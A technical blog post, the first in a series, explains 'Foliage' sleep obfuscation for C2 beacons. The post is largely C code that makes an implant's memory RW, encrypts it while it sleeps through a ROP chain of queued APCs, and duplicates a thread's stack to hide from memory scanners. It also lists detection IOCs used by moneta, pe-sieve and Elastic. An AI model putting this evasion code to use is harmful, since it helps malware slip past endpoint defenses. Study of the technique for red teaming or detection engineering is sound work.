Evading detection in memory - Pt 1: Sleep Obfuscation - Foliage

In this post, we will cover topics such as memory detection evasion. We will discuss how memory scanners work and APC-based sleeping obfuscation.

Posted Nov 5, 2024 Updated Jan 11, 2025

10 min read

Introduction

First, we will talk about the types of memory. They are:

PRIVATE – Not shared with other processes and its protection can be changed after allocation. Note: APIs such as VirtualAlloc and VirtualAllocEx are used, which are means to call NtAllocateVirtualMemory.
MAPPED – Can be shared with other processes, and its protection cannot be changed after allocation. Note: One way to achieve this is CreateFileMapping + MapViewOfFile.
IMAGE – Refers to memory that has a backup on disk. For example, the executable that starts the process and the loaded DLLs.

These are categories that represent the values of the Type parameter in the MEMORY_BASIC_INFORMATION structure, which can be retrieved using the base address of memory passed to the VirtualQuery API. The most commonly used memory type by malware is private memory, because it allows the protection of memory to be modified at runtime, unlike mapped memory. Command and Control (C2) implants/agents/beacons use shellcode Reflection DLL Injection (sRDI) to create shellcode based on a beacon DLL. This technique can be used with evasion loaders to bypass defense solutions.

The loader doesn’t need to use a complex technique, as it will only be a Proof of Concept (PoC). First, the injection process occurs, regardless of the evasion technique used. Then, the shellcode Reflection DLL Injection (sRDI) specifically acts on the part highlighted in red, reflecting the PE DLL into another private memory space, containing only the sections, and executing the entry point.

Detection in memory

A memory scan consumes significant computational resources, so the EDR uses criteria to determine where to perform the scan. Among these criteria are memory spaces without backups that have execution permissions, which would signal our beacon. The raw data is also compared with a signature/rules database. Another way to detect our beacon is by analyzing the call stack of the thread. The return of post-exploitation commands and beacon calls in the sleep state would point to our private memory where the beacon resides, indicating that the code is being executed from that address.

In this blog, we will cover how to keep the implant obfuscated in memory, hide execution permissions, and conceal the main code. This approach helps avoid detection by memory scans and prevents analysis by ensuring the memory region has no execute permissions.

Sleep Obfuscation

Sleep Obfuscation is a technique we can use to hide our beacon in memory from potential memory scans. Essentially, we follow the chain below:

Change the memory protection from RX to RW
Encrypt the memory region
Put the process to sleep for a defined period
Decrypt the memory region
Change the memory permission from RW back to RX
Execute a post-exploitation command from the C2, if available
Repeat the obfuscation chain

Now you must be wondering:

“How do we proceed to the next step after changing the memory protection to RW? We no longer have execution permissions.”

At least, I hope you’re asking yourself this question 😁. Well, it would indeed be impossible to execute any instructions with memory in RW without the execution permission, and this is where we use ROP chains (Return-Oriented Programming) with timers or APCs (Asynchronous Procedure Calls), which are the well-known methods to achieve this.

Key Concepts: ROP Chains, Timers and APCs

Technique	Details
ROP Chains	Return-Oriented Programming is a technique where small chunks of executable code (gadgets) are reused to construct a chain of instructions that can perform arbitrary actions. These are useful when direct execution is not possible.
Timers	Timers can be used in ROP chains to schedule the execution of a specific function after a delay. This is useful when you want to control when a piece of code executes after the memory state has been modified.
APCs	Asynchronous Procedure Calls allow you to queue functions to be executed in the context of a thread. This technique can help to run code in a specific thread without needing immediate execution permissions.

Foliage

In this article, we will use foliage, which is a sleep obfuscation technique based on APC. Simplifying the flow of foliage to perform Sleep Obfuscation, it will work as follows:

We will create a synchronization event using the NTAPI call NtCreateEvent.

  
Status = Instance()->Win32.NtCreateEvent( &EvtSync, EVENT_ALL_ACCESS, NULL, SynchronizationEvent, FALSE );
if ( Status != 0x00 ) {
    PrintErr( "NtCreateEvent", Status );
}

We will create a suspended thread (the thread where the chain mentioned above will be executed).

  
Status = Instance()->Win32.NtCreateThreadEx( &hSlpThread, THREAD_ALL_ACCESS, NULL, NtCurrentProcess(), NULL, NULL, TRUE, 0, 0x1000 * 20, 0x1000 * 20, NULL );
if ( Status != 0x00 ) {
    PrintErr( "NtCreateThreadEx", Status );
}

We will retrieve the context of the created thread and transfer it to other CONTEXT structures, where the chain will be constructed.

  
CtxMain.ContextFlags = CONTEXT_FULL;
Status = Instance()->Win32.NtGetContextThread( hSlpThread, &CtxMain );
if ( Status != 0x00 ) {
    PrintErr( "NtGetContextThread", Status );
}

We will set the Rsp register to always return to NtTestAlert. This is done because NtTestAlert checks if there are any pending APCs to be executed. If so, they will be executed.

  
*(PVOID*)CtxMain.Rsp = Instance()->Win32.NtTestAlert;

After populating the other CONTEXT structures with the values returned in CtxMain, we can finally execute the chain.

  
/* 
 * wait EvtSync gets triggered
 * NtWaitForGingleObject( EvtSync, FALSE, NULL ); 
 */
RopSetEvt.Rip = NtWaitForSingleObject;
RopSetEvt.Rcx = EvtSync;
RopSetEvt.Rdx = FALSE;
RopSetEvt.R9  = NULL;

/*
 * Change implant protection to RW
 * VirtualProtect( ImageBase, ImageSize, PAGE_READWRITE, &OldProt ); 
 */
RopProtRw.Rip = VirtualProtect;
RopProtRw.Rcx = ImageBase;
RopProtRw.Rdx = ImageSize;
RopProtRw.R8  = PAGE_READWRITE;
RopProtRw.R9  = &OldProt;

/*
 * memory encryption
 * SystemFunction( &Img, &Key );
 */
RopMemEnc.Rip = SystemFunction040;
RopMemEnc.Rcx = ImageBase;
RopMemEnc.Rdx = ImageSize;

/*
 * delay
 * WaitForSingleObjectEx( NtCurrentProcess(), SleepTime, FALSE );
 */
RopDelay.Rip = Instance()->Win32.WaitForSingleObjectEx;
RopDelay.Rcx = NtCurrentProcess();
RopDelay.Rdx = SleepTime;
RopDelay.R8  = FALSE;

/*
 * memory decryption
 * SystemFunction( &Img, &Key );
 */
RopMemDec.Rip = Instance()->Win32.SystemFunction041;
RopMemDec.Rcx = ImageBase;
RopMemDec.Rdx = ImageSize;

/*
 * change memory to execute and read
 * VirtualProtect( ImageBase, ImageSize, PAGE_EXECUTE_READ, &oldProt );
 */
RopProtRx.Rip = Instance()->Win32.VirtualProtect;
RopProtRx.Rcx = ImageBase;
RopProtRx.Rdx = ImageSize;
RopProtRx.R8  = PAGE_EXECUTE_READ;
RopProtRx.R9  = &OldProt;

/*
 * exit thread
 * RtlExitUserThread( 0x00 );
 */
RopExit.Rip = Instance()->Win32.RtlExitUserThread;
RopExit.Rcx = 0x00;

Now, we enqueue the APC with the CONTEXT structures and pass it as a parameter to NtContinue.

  
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopSetEvt, FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopProtRw, FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopMemEnc, FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopDelay , FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopMemDec, FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopProtRx, FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopExit  , FALSE, NULL );

Finally, we will resume the thread, trigger the synchronization event, and let it run while the current thread sleeps.

  
Status = Instance()->Win32.NtAlertResumeThread( hSlpThread, NULL );
if ( Status != 0x00 ) {
    PrintErr( "NtAlertResumeThread", Status );
}

Instance()->Win32.printf( "[I] Trigger sleep obf chain\n\n" );

Status = Instance()->Win32.NtSignalAndWaitForSingleObject( EvtSync, hSlpThread, TRUE, NULL );
if ( Status != 0x00 ) {
    PrintErr( "NtSignalAndWaitForSingleObject", Status );
}

Demo

Opening our implant in x64dbg and setting breakpoints on the routine functions of the chain to see the step-by-step process. We will also use software that provides more information about processes. In this case, I will be using Process Hacker, but alternatively, Process Explorer from Sysinternals can be used.

The loader we use provides us with the base allocation address. Now, below we will access the address.

Deobfuscated region

At this point, we have plaintext strings, and the memory region is separated into RX and RW. Now, we will see the result of the first VirtualProtect.

Executing VirtualProtect RX → RW

Result of Executing VirtualProtect RX → RW

After execution, the memory region was set to RW as expected. The next step is to encrypt it using SystemFunction040.

Executing SystemFunction040 to encrypt the memory area

Next, we can observe the obfuscated memory region. This is how we find it during sleep. Now, we proceed to decrypt it using SystemFunction041.

Executing SystemFunction041

Above, the decrypted data, and the memory region returns to 12KB RX and 4KB RW.

When analyzing with the memory analysis tool called pe-sieve, we obtain the following results:

Detections and IOCs

As mentioned earlier, one way to analyze a process is by inspecting the thread stack and observing the calling function. This method can be used to flag our implant, as during the sleep state, the thread will be pointing back to the memory region set to RW. This is problematic for us, as it makes detection easier.

post-ex activity:

Sleep routine:

Looking at moneta we can note the IOC previously mentioned.

Another method of detection involves the callback from VirtualProtect to NtTestAlert, which is commonly used for security monitoring. For example, Elastic EDR leverages this IOC (Indicator of Compromise) to detect suspicious activity, rule here.

Stack Duplication

Regarding this moneta IOC it is about the Stack containing NtSignalAndWaitForSingleObject that stays during sleep. We managed to solve this using something called Stack Duplication in which we will clone all thread properties including registers, stack/stack (where it will contain the return addresses) and so on. Starting steps:

Look for another thread running in the process and use the API [NtGetContextThread](https://ntdoc.m417z.com/ntgetcontextthread)/NtSetContextThread to get the properties and DuplicateHandle to duplicate the found thread

  
Status = bkThreadOpen(
	THREAD_ALL_ACCESS, FALSE, DupThreadId, &DupThreadHandle 
);    
Status = Instance()->Win32().DuplicateHandle(
	NtCurrentProcess(), NtCurrentThread(), NtCurrentProcess(), 
	&MainThreadHandle, THREAD_ALL_ACCESS, FALSE, 0 
);

Perform a backup of the state of the current thread and set the thread that we decided to impersonate the properties within the obfuscation routine

  
  RopCtxGetBkp.Rip = Instance()->Win32().NtGetContextThread;
  RopCtxGetBkp.Rcx = MainThreadHandle;
  RopCtxGetBkp.Rdx = &CtxBkp;

  RopCtxSetSpf.Rip = Instance()->Win32().NtSetContextThread;
	RopCtxSetSpf.Rcx = MainThreadHandle;
  RopCtxSetSpf.Rdx = &CtxSpf;

And before completing the routine we will return the backup

  
  RopCtxSetBkp.Rip = Instance()->Win32().NtSetContextThread;
  RopCtxSetBkp.Rcx = MainThreadHandle;
	RopCtxSetBkp.Rdx = &CtxBkp;

This way, the main beacon stack during obfuscation will look like this

Escaping detections based on the beacon’s main thread stack.

Conclusion

There are ways to improve our obfuscation with Sleep and we will mention one of them in our next blog post which is Module Stomping, using Jump Gadgets and avoiding detection based on ETW- IT as the Fluctuation Monitor.

However, there are ways to improve our Sleep Obfuscation to bypass these detection techniques. One such method I will cover in this blog is Stack Duplication.

Another interesting technique is Module Stomping, which will be the topic of the next article in this blog.

Reference and credits

Malware Development

This post is licensed under CC BY 4.0 by the author.